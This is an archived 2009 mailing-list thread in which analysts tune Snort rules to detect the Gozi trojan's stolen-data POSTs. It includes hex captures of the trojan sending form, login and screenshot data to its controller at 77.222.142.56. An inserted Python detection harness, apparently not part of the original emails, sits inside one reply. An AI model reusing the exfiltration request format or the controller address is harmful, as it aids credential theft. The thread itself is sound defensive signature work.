[Emerging-Sigs] Gozi/Ordergun/Orderjack sig mod + new

Darren Spruell phatbuckett at gmail.com
Thu Jan 29 18:38:25 EST 2009


Don't forget ss.cgi (my post 1/28) and looks like there's also a file.cgi too:

http://ddanchev.blogspot.com/2008/01/random-js-malware-exploitation-kit.html

In addition to cert.cgi, I've also picked up from somewhere that
certs.cgi has been used (trying to find a reference).

I expect there to be more FPs out there; I've seen forms.cgi in particular used, e.g.:

# yeah, it's a GET so no FP on the rule looking for POST, but including to illustrate
POST http://www.cowgirlartist.com/cgi-bin/forms.cgi
GET http://www.wirespring.com/cgi-bin/forms.cgi?form=3&headline=...
GET http://www.greenmountainenergy.com/cgi-bin/forms.cgi?form=6
GET http://www.sullarete.com/cgi-bin/forms.cgi?form=10
POST http://www.courtinfo.ca.gov/cgi-bin/forms.cgi
GET http://www.nwsc.org/cgi-bin/forms.cgi?form=1

...and cmd.cgi, options.cgi, file.cgi...:

GET  http://www.onlinefutureinc.com/cgi-bin/cmd.cgi?af=415398&u...
GET  http://iquote1.neoyen.net.tw/cgi-bin/file.cgi?ARG=otcname.dat
GET  http://www.scienceofbeingwell.net/cgi-bin/cmd.cgi?Imp=1006352
GET  http://sescompanies.net/cgi-bin/options.cgi?id=US00...

Further anchoring with the 'Content-Type: multipart...' header might
be worth including still, or there's an opportunity to match on "URL:
" for pstore.cgi and forms.cgi and the Content-Disposition and
Content-Type values if helpful:

~~~~~~~~~~
POST /cgi-bin/forms.cgi HTTP/1.1
Content-Type: multipart/form-data;
boundary=--------------------------01400b2f08b7
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: 77.222.142.56
Content-Length: 358
Connection: Keep-Alive
Cache-Control: no-cache

----------------------------01400b2f08b7
Content-Disposition: form-data; name="upload_file"; filename="3337220749.0002"
Content-Type: application/octet-stream

URL: https://example.org
foo=bar

----------------------------01400b2f08b7--
~~~~~~~~~~

DS
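As an added illustration (not code from this thread or the ET ruleset), a small Python harness that runs the two rule styles being discussed over a constructed copy of the forms.cgi POST above and over constructed benign forms.cgi traffic: a URI-only match fires on any legitimate POST to the script, while the header-anchored version and the "URL: " part-body anchor do not. Host, URL and query values are placeholders.

```python
import re

# Constructed sample modelled on the forms.cgi POST quoted in this thread;
# the Host and URL values are placeholders, not indicators from the capture.
GOZI_POST = (
    b"POST /cgi-bin/forms.cgi HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=--------------------------01400b2f08b7\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
    b"Host: 192.0.2.10\r\nContent-Length: 358\r\nConnection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n\r\n"
    b"----------------------------01400b2f08b7\r\n"
    b'Content-Disposition: form-data; name="upload_file"; filename="3337220749.0002"\r\n'
    b"Content-Type: application/octet-stream\r\n\r\n"
    b"URL: https://example.org\r\nfoo=bar\r\n"
    b"----------------------------01400b2f08b7--\r\n"
)
# Constructed benign requests to a legitimate /cgi-bin/forms.cgi (the FP case)
BENIGN_GET = b"GET /cgi-bin/forms.cgi?form=3 HTTP/1.1\r\nHost: www.example.com\r\n\r\n"
BENIGN_POST = (b"POST /cgi-bin/forms.cgi HTTP/1.1\r\nHost: www.example.com\r\n"
               b"User-Agent: Mozilla/5.0\r\n"
               b"Content-Type: application/x-www-form-urlencoded\r\n\r\nq=1")

GOZI_UA = b"\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
MULTIPART = b"\r\nContent-Type: multipart/form-data; boundary="


def uri_only_rule(payload, script=b"forms.cgi"):
    """Approximates the looser rule: 'POST ' in the first 5 bytes and a
    request URI ending in /<script>. Any legitimate POST to that script fires."""
    request_line = payload.split(b"\r\n", 1)[0]
    parts = request_line.split(b" ")
    return payload[:5] == b"POST " and len(parts) == 3 and parts[1].endswith(b"/" + script)


def anchored_rule(payload, script=b"forms.cgi"):
    """Approximates the tighter rule: fixed request-line prefix checked at a depth
    equal to its length, plus the multipart, Gozi UA and Host header strings.
    Plain content matches in Snort are unordered, so each is a substring test."""
    prefix = b"POST /cgi-bin/" + script
    if payload[:len(prefix)] != prefix:
        return False
    return all(needle in payload for needle in (MULTIPART, GOZI_UA, b"\r\nHost: "))


def exfil_part_marker(payload):
    """Extra anchor suggested in the thread: the upload_file part body starts with 'URL: '."""
    _head, sep, body = payload.partition(b"\r\n\r\n")
    return bool(sep) and re.search(rb'name="upload_file".*?\r\n\r\nURL: ', body, re.S) is not None
```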


On Thu, Jan 29, 2009 at 1:13 PM, dxp <dxp2532 at gmail.com> wrote:
> Good point on the PCRE.  It's worth breaking this one down into three rules
> instead:
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS \
>   (msg:"ET TROJAN Gozi Data Information Leakage (Forms)"; flow:established,to_server; \
>   content:"POST "; depth:5; uricontent:"/forms.cgi "; \
>   classtype:trojan-activity; sid:XXXXXX; rev:1;)
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS \
>   (msg:"ET TROJAN Gozi Data Information Leakage (PStore)"; flow:established,to_server; \
>   content:"POST "; depth:5; uricontent:"/pstore.cgi "; \
>   classtype:trojan-activity; sid:XXXXXX; rev:1;)
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS \
>   (msg:"ET TROJAN Gozi Data Information Leakage (Cert)"; flow:established,to_server; \
>   content:"POST "; depth:5; uricontent:"/cert.cgi "; \
>   classtype:trojan-activity; sid:XXXXXX; rev:1;)
>
> -
>
> -=[ dxp ]=-
> 0xA3F3C6E3
>
>
>
> On Thu, 2009-01-29 at 13:23 -0500, Matt Jonkman wrote:
>
> We can't go pcre on this, it'd be just too high a load. Have to stay
> with the 3 separate sigs for the main ruleset. but this would be useful
> on boxes without load issues.
>
> Matt
>
> dxp wrote:
>> I just double checked on one sample I have of this trojan from October
>> 2008 and the UAS is embedded in the binary.  However, this may change in
>> the future and then POSTs will be missed.
>>
>> I have had the following sig applied in my production environment for
>> several months now without false positives:
>>
>>     alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS \
>>       (msg:"ET TROJAN Gozi Form Data Information Leakage"; flow:established,to_server; \
>>       content:"POST "; depth:5; \
>>       pcre:"/\/(forms|pstore|cert)\.cgi\sHTTP\/1\.[01]\x0d\x0a/i"; \
>>       classtype:trojan-activity; sid:XXXXXX; rev:1;)
>>
>>
>> -
>>
>> -=[ dxp ]=-
>> 0xA3F3C6E3
>>
>>
>>
>>
>> On Wed, 2009-01-28 at 01:50 -0700, Darren Spruell wrote:
>>> Picked up a Gozi-infected host chatting with its controller and noticed a
>>> few of the rules could do with an overhaul and a couple more could be
>>> added in for POST operations not detected. The base rules were
>>> 2003509/2003510/2003511 but I thought there were a couple of issues:
>>>
>>> - the rules have a content match where a trailing '?' is specified but
>>> are then followed by a pcre where it is missing. The communication
>>> I've got has no trailing question mark on the POSTs.
>>> - the rules seem needlessly heavy on pcre. I substituted content
>>> matches instead.
>>>
>>> # update to 2003511
>>> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS \
>>>   (msg:"ET TROJAN Gozi Form Data Information Leakage"; flow:to_server,established; \
>>>   content:"POST /cgi-bin/forms.cgi"; depth:23; \
>>>   content:"|0d 0a|Content-Type: multipart/form-data\; boundary="; \
>>>   content:"|0d 0a|User-Agent\: Mozilla/4.0 (compatible\; MSIE 6.0\; Windows NT 5.1)"; \
>>>   content:"|0d 0a|Host\: "; classtype:trojan-activity; \
>>>   reference:url,www.secureworks.com/research/threats/gozi; sid:2003511; rev:3;)
>>> # new rule for POSTs of private store data
>>> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS \
>>>   (msg:"ET TROJAN Gozi Private Store Information Leakage"; flow:to_server,established; \
>>>   content:"POST /cgi-bin/pstore.cgi"; depth:24; \
>>>   content:"|0d 0a|Content-Type: multipart/form-data\; boundary="; \
>>>   content:"|0d 0a|User-Agent\: Mozilla/4.0 (compatible\; MSIE 6.0\; Windows NT 5.1)"; \
>>>   content:"|0d 0a|Host\: "; classtype:trojan-activity; \
>>>   reference:url,www.secureworks.com/research/threats/gozi; sid:XXXXXXX; rev:1;)
>>> # new rule for POSTs of screenshot (JPEG) data
>>> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS \
>>>   (msg:"ET TROJAN Gozi Screen Capture Information Leakage"; flow:to_server,established; \
>>>   content:"POST /cgi-bin/ss.cgi"; depth:20; \
>>>   content:"|0d 0a|Content-Type: multipart/form-data\; boundary="; \
>>>   content:"|0d 0a|User-Agent\: Mozilla/4.0 (compatible\; MSIE 6.0\; Windows NT 5.1)"; \
>>>   content:"|0d 0a|Host\: "; classtype:trojan-activity; \
>>>   reference:url,www.secureworks.com/research/threats/gozi; sid:XXXXXXX; rev:1;)
>>>
>>>
>>> There's room for improvement with tightening these down if needed by
>>> anchoring the content matches or adding additional payload. Obfuscated
>>> requests included below.
>>>
>>>
>>> --- snip forms.cgi ---
>>>   0x0000:  4500 02a1 1c37 4000 7a06 d19f 83c9 b0a0  E....7@.z.......
>>>   0x0010:  4dde 8e38 04f3 0050 a837 99c8 e53f 91bf  M..8...P.7...?..
>>>   0x0020:  5018 fc00 21df 0000 504f 5354 202f 6367  P...!...POST./cg
>>>   0x0030:  692d 6269 6e2f 666f 726d 732e 6367 6920  i-bin/forms.cgi.
>>>   0x0040:  4854 5450 2f31 2e31 0d0a 436f 6e74 656e  HTTP/1.1..Conten
>>>   0x0050:  742d 5479 7065 3a20 6d75 6c74 6970 6172  t-Type:.multipar
>>>   0x0060:  742f 666f 726d 2d64 6174 613b 2062 6f75  t/form-data;.bou
>>>   0x0070:  6e64 6172 793d 2d2d 2d2d 2d2d 2d2d 2d2d  ndary=----------
>>>   0x0080:  2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d  ----------------
>>>   0x0090:  3031 3430 3062 3266 3038 6237 0d0a 5573  01400b2f08b7..Us
>>>   0x00a0:  6572 2d41 6765 6e74 3a20 4d6f 7a69 6c6c  er-Agent:.Mozill
>>>   0x00b0:  612f 342e 3020 2863 6f6d 7061 7469 626c  a/4.0.(compatibl
>>>   0x00c0:  653b 204d 5349 4520 362e 303b 2057 696e  e;.MSIE.6.0;.Win
>>>   0x00d0:  646f 7773 204e 5420 352e 3129 0d0a 486f  dows.NT.5.1)..Ho
>>>   0x00e0:  7374 3a20 3737 2e32 3232 2e31 3432 2e35  st:.77.222.142.5
>>>   0x00f0:  360d 0a43 6f6e 7465 6e74 2d4c 656e 6774  6..Content-Lengt
>>>   0x0100:  683a 2033 3538 0d0a 436f 6e6e 6563 7469  h:.358..Connecti
>>>   0x0110:  6f6e 3a20 4b65 6570 2d41 6c69 7665 0d0a  on:.Keep-Alive..
>>>   0x0120:  4361 6368 652d 436f 6e74 726f 6c3a 206e  Cache-Control:.n
>>>   0x0130:  6f2d 6361 6368 650d 0a0d 0a2d 2d2d 2d2d  o-cache....-----
>>>   0x0140:  2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d  ----------------
>>>   0x0150:  2d2d 2d2d 2d2d 2d30 3134 3030 6232 6630  -------01400b2f0
>>>   0x0160:  3862 370d 0a43 6f6e 7465 6e74 2d44 6973  8b7..Content-Dis
>>>   0x0170:  706f 7369 7469 6f6e 3a20 666f 726d 2d64  position:.form-d
>>>   0x0180:  6174 613b 206e 616d 653d 2275 706c 6f61  ata;.name="uploa
>>>   0x0190:  645f 6669 6c65 223b 2066 696c 656e 616d  d_file";.filenam
>>>   0x01a0:  653d 2233 3333 3732 3230 3734 392e 3030  e="3337220749.00
>>>   0x01b0:  3032 220d 0a43 6f6e 7465 6e74 2d54 7970  02"..Content-Typ
>>>   0x01c0:  653a 2061 7070 6c69 6361 7469 6f6e 2f6f  e:.application/o
>>>   0x01d0:  6374 6574 2d73 7472 6561 6d0d 0a0d 0a55  ctet-stream....U
>>>   0x01e0:  524c 3a20 6874 7470 733a 2f2f xxxx xxxx  RL:.https://xxxx
>>>   0x01f0:  xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxxx  xxxxxxxxxxxxxxxx
>>>   0x0200:  xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxxx  xxxxxxxxxxxxxxxx
>>>   0x0210:  xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxxx  xxxxxxxxxxxxxxxx
>>>   0x0220:  xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxxx  xxxxxxxxxxxxxxxx
>>>   0x0230:  xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxxx  xxxxxxxxxxxxxxxx
>>>   0x0240:  xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxxx  xxxxxxxxxxxxxxxx
>>>   0x0250:  xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxxx  xxxxxxxxxxxxxxxx
>>>   0x0260:  6564 6972 6563 742e 6e73 6625 3346 4f70  edirect.nsf%3FOp
>>>   0x0270:  656e 0a0d 0a2d 2d2d 2d2d 2d2d 2d2d 2d2d  en...-----------
>>>   0x0280:  2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d  ----------------
>>>   0x0290:  2d30 3134 3030 6232 6630 3862 372d 2d0d  -01400b2f08b7--.
>>>   0x02a0:  0a
>>> --- snip ---
>>>
>>>
>>> --- snip pstore.cgi ---
>>>   0x0000:  4500 013d 01c6 4000 7a06 ed74 83c9 b0a0  E..=..@.z..t....
>>>   0x0010:  4dde 8e38 043b 0050 9534 9b64 59fd a004  M..8.;.P.4.dY...
>>>   0x0020:  5018 fc00 c3af 0000 504f 5354 202f 6367  P.......POST./cg
>>>   0x0030:  692d 6269 6e2f 7073 746f 7265 2e63 6769  i-bin/pstore.cgi
>>>   0x0040:  2048 5454 502f 312e 310d 0a43 6f6e 7465  .HTTP/1.1..Conte
>>>   0x0050:  6e74 2d54 7970 653a 206d 756c 7469 7061  nt-Type:.multipa
>>>   0x0060:  7274 2f66 6f72 6d2d 6461 7461 3b20 626f  rt/form-data;.bo
>>>   0x0070:  756e 6461 7279 3d2d 2d2d 2d2d 2d2d 2d2d  undary=---------
>>>   0x0080:  2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d  ----------------
>>>   0x0090:  2d31 6535 3830 6534 3930 3537 350d 0a55  -1e580e490575..U
>>>   0x00a0:  7365 722d 4167 656e 743a 204d 6f7a 696c  ser-Agent:.Mozil
>>>   0x00b0:  6c61 2f34 2e30 2028 636f 6d70 6174 6962  la/4.0.(compatib
>>>   0x00c0:  6c65 3b20 4d53 4945 2036 2e30 3b20 5769  le;.MSIE.6.0;.Wi
>>>   0x00d0:  6e64 6f77 7320 4e54 2035 2e31 290d 0a48  ndows.NT.5.1)..H
>>>   0x00e0:  6f73 743a 2037 372e 3232 322e 3134 322e  ost:.77.222.142.
>>>   0x00f0:  3536 0d0a 436f 6e74 656e 742d 4c65 6e67  56..Content-Leng
>>>   0x0100:  7468 3a20 3136 3630 0d0a 436f 6e6e 6563  th:.1660..Connec
>>>   0x0110:  7469 6f6e 3a20 4b65 6570 2d41 6c69 7665  tion:.Keep-Alive
>>>   0x0120:  0d0a 4361 6368 652d 436f 6e74 726f 6c3a  ..Cache-Control:
>>>   0x0130:  206e 6f2d 6361 6368 650d 0a0d 0a         .no-cache....
>>>
>>>   0x0000:  4500 05dc 01c7 4000 7a06 e8d4 83c9 b0a0  E.....@.z.......
>>>   0x0010:  4dde 8e38 043b 0050 9534 9c79 59fd a004  M..8.;.P.4.yY...
>>>   0x0020:  5010 fc00 176e 0000 2d2d 2d2d 2d2d 2d2d  P....n..--------
>>>   0x0030:  2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d  ----------------
>>>   0x0040:  2d2d 2d2d 3165 3538 3065 3439 3035 3735  ----1e580e490575
>>>   0x0050:  0d0a 436f 6e74 656e 742d 4469 7370 6f73  ..Content-Dispos
>>>   0x0060:  6974 696f 6e3a 2066 6f72 6d2d 6461 7461  ition:.form-data
>>>   0x0070:  3b20 6e61 6d65 3d22 7570 6c6f 6164 5f66  ;.name="upload_f
>>>   0x0080:  696c 6522 3b20 6669 6c65 6e61 6d65 3d22  ile";.filename="
>>>   0x0090:  3333 3337 3232 3037 3439 2e30 3030 3222  3337220749.0002"
>>>   0x00a0:  0d0a 436f 6e74 656e 742d 5479 7065 3a20  ..Content-Type:.
>>>   0x00b0:  6170 706c 6963 6174 696f 6e2f 6f63 7465  application/octe
>>>   0x00c0:  742d 7374 7265 616d 0d0a 0d0a 5552 4c3a  t-stream....URL:
>>>   0x00d0:  2068 7474 703a 2f2f xxxx xxxx xx2e 636f  .http://xxxxx.co
>>>   0x00e0:  6d2f 0a09 4c6f 6769 6e3a 20xx xxxx xxxx  m/..Login:.xxxxx
>>>   0x00f0:  xxxx xx40 xxxx xxxx xxxx xxxx xxxx 2e63  xxx@xxxxxxxxxx.c
>>>   0x0100:  6f6d 0a0a                                om..
>>> --- snip ---
>>>
>>>
>>>
>>> --- snip ss.cgi ---
>>>   0x0000:  4500 013a 7832 4000 7a06 770b 83c9 b0a0  E..:x2@.z.w.....
>>>   0x0010:  4dde 8e38 09b6 0050 3536 8438 b717 9b0b  M..8...P56.8....
>>>   0x0020:  5018 fc00 0e6d 0000 504f 5354 202f 6367  P....m..POST./cg
>>>   0x0030:  692d 6269 6e2f 7373 2e63 6769 2048 5454  i-bin/ss.cgi.HTT
>>>   0x0040:  502f 312e 310d 0a43 6f6e 7465 6e74 2d54  P/1.1..Content-T
>>>   0x0050:  7970 653a 206d 756c 7469 7061 7274 2f66  ype:.multipart/f
>>>   0x0060:  6f72 6d2d 6461 7461 3b20 626f 756e 6461  orm-data;.bounda
>>>   0x0070:  7279 3d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d  ry=-------------
>>>   0x0080:  2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d31 3634  -------------164
>>>   0x0090:  6530 3465 3230 3163 360d 0a55 7365 722d  e04e201c6..User-
>>>   0x00a0:  4167 656e 743a 204d 6f7a 696c 6c61 2f34  Agent:.Mozilla/4
>>>   0x00b0:  2e30 2028 636f 6d70 6174 6962 6c65 3b20  .0.(compatible;.
>>>   0x00c0:  4d53 4945 2036 2e30 3b20 5769 6e64 6f77  MSIE.6.0;.Window
>>>   0x00d0:  7320 4e54 2035 2e31 290d 0a48 6f73 743a  s.NT.5.1)..Host:
>>>   0x00e0:  2037 372e 3232 322e 3134 322e 3536 0d0a  .77.222.142.56..
>>>   0x00f0:  436f 6e74 656e 742d 4c65 6e67 7468 3a20  Content-Length:.
>>>   0x0100:  3835 3039 330d 0a43 6f6e 6e65 6374 696f  85093..Connectio
>>>   0x0110:  6e3a 204b 6565 702d 416c 6976 650d 0a43  n:.Keep-Alive..C
>>>   0x0120:  6163 6865 2d43 6f6e 7472 6f6c 3a20 6e6f  ache-Control:.no
>>>   0x0130:  2d63 6163 6865 0d0a 0d0a                 -cache....
>>>
>>>   0x0000:  4500 05dc 7833 4000 7a06 7268 83c9 b0a0  E...x3@.z.rh....
>>>   0x0010:  4dde 8e38 09b6 0050 3536 854a b717 9b0b  M..8...P56.J....
>>>   0x0020:  5010 fc00 9e4e 0000 2d2d 2d2d 2d2d 2d2d  P....N..--------
>>>   0x0030:  2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d  ----------------
>>>   0x0040:  2d2d 2d2d 3136 3465 3034 6532 3031 6336  ----164e04e201c6
>>>   0x0050:  0d0a 436f 6e74 656e 742d 4469 7370 6f73  ..Content-Dispos
>>>   0x0060:  6974 696f 6e3a 2066 6f72 6d2d 6461 7461  ition:.form-data
>>>   0x0070:  3b20 6e61 6d65 3d22 7570 6c6f 6164 5f66  ;.name="upload_f
>>>   0x0080:  696c 6522 3b20 6669 6c65 6e61 6d65 3d22  ile";.filename="
>>>   0x0090:  3333 3337 3232 3037 3439 2e30 3030 3222  3337220749.0002"
>>>   0x00a0:  0d0a 436f 6e74 656e 742d 5479 7065 3a20  ..Content-Type:.
>>>   0x00b0:  6170 706c 6963 6174 696f 6e2f 6f63 7465  application/octe
>>>   0x00c0:  742d 7374 7265 616d 0d0a 0d0a ffd8 ffe0  t-stream........
>>>   0x00d0:  0010 4a46 4946 0001 0101 0060 0060 0000  ..JFIF.....`.`..
>>> --- snip ---
>>>
>>



-- 
Darren Spruell
phatbuckett at gmail.com

